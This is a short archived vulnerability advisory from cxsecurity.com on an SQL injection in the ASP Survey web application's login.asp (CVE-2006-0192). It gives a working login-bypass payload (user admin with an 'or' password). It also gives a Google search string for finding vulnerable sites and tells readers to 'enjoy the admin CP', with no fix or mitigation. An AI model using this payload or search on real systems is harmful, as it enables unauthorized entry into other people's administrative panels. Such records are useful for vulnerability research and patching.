Bug: sql injection in ASP Survey (WLB-2006020024 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: sql injection in ASP Survey
 Credit: mfoxhacker
 Date: 2006.02.05
 CWE: CWE-89 (Show similar)
 CVE: CVE-2006-0192 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
Yes
Yes

Hi guys
there is a simple sql injection in web app. (ASP Survey) by this vuln. you can go into the admin page

Target Page : login.asp
Vendor : ASP Survey
Exploit : User: admin Password: 'or'

Hacking: 1. search on google.com as :
allinurl:"login.asp" ASPsurvey
and then type the Exploit in correct order...
and Enjoy the admin CP.

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com